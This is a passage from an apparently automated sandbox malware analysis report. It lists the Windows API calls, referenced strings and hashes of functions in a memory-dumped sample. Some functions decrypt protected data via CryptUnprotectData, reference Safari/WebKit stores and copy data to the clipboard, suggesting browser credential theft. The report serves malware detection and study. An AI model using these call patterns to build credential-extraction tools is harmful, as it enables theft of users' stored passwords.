                                                                                                                                                              • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                                                                              • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: free
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                              • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                              • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                              • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                              • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: free
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                              • Opcode ID: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                                                                              • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                                                                                                                                              • Opcode Fuzzy Hash: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                                                                              • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D
                                                                                                                                                              APIs
                                                                                                                                                              • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                              • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                              • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3604893535-0
                                                                                                                                                              • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                              • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                                                              • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                              • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                                                              APIs
                                                                                                                                                              • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                              • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                              • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                              • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1213725291-0
                                                                                                                                                              • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                                                                                              • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                                                              • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                                                                                              • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                                                              APIs
                                                                                                                                                              • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                              • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                              • free.MSVCRT ref: 00418370
                                                                                                                                                                • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                              • String ID: OsError 0x%x (%u)
                                                                                                                                                              • API String ID: 2360000266-2664311388
                                                                                                                                                              • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                              • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                              • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                              • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??2@??3@memcpymemset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1865533344-0
                                                                                                                                                              • Opcode ID: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                                                                                              • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                                                                              • Opcode Fuzzy Hash: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                                                                                              • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                                                                              APIs
                                                                                                                                                              • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: NtdllProc_Window
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4255912815-0
                                                                                                                                                              • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                              • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                                                                              • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                              • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                                                                              APIs
                                                                                                                                                              • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                              • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                              • memset.MSVCRT ref: 0040265F
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                              • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                                                                                                              • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                              • API String ID: 2929817778-1134094380
                                                                                                                                                              • Opcode ID: 6b2dcad71dd29105a6653737fa8e45fa2e3e7ed8fa5e3c17c72860e5870ea394
                                                                                                                                                              • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                              • Opcode Fuzzy Hash: 6b2dcad71dd29105a6653737fa8e45fa2e3e7ed8fa5e3c17c72860e5870ea394
                                                                                                                                                              • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                              • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                              • API String ID: 2787044678-1921111777
                                                                                                                                                              • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                                                                              • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                                              • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                                                                              • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                              • GetDC.USER32 ref: 004140E3
                                                                                                                                                              • wcslen.MSVCRT ref: 00414123
                                                                                                                                                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                              • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                              • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                              • String ID: %s:$EDIT$STATIC
                                                                                                                                                              • API String ID: 2080319088-3046471546
                                                                                                                                                              • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                                                                              • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                              • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                                                                              • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                              APIs
                                                                                                                                                              • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                              • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                              • memset.MSVCRT ref: 00413292
                                                                                                                                                              • memset.MSVCRT ref: 004132B4
                                                                                                                                                              • memset.MSVCRT ref: 004132CD
                                                                                                                                                              • memset.MSVCRT ref: 004132E1
                                                                                                                                                              • memset.MSVCRT ref: 004132FB
                                                                                                                                                              • memset.MSVCRT ref: 00413310
                                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                              • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                              • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                              • memset.MSVCRT ref: 004133C0
                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                              • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                                                              • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                              • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                              • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                              Strings
                                                                                                                                                              • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                              • {Unknown}, xrefs: 004132A6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                              • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                              • API String ID: 4111938811-1819279800
                                                                                                                                                              • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                                                                              • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                                              • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                                                                              • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                              • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                              • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                              • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                              • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                              • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                              • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                              • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 829165378-0
                                                                                                                                                              • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                                                                              • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                              • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                                                                              • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 00404172
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                              • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                              • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                              • memset.MSVCRT ref: 00404200
                                                                                                                                                              • memset.MSVCRT ref: 00404215
                                                                                                                                                              • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                              • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                              • memset.MSVCRT ref: 0040426E
                                                                                                                                                              • memset.MSVCRT ref: 004042CD
                                                                                                                                                              • memset.MSVCRT ref: 004042E2
                                                                                                                                                              • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                              • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
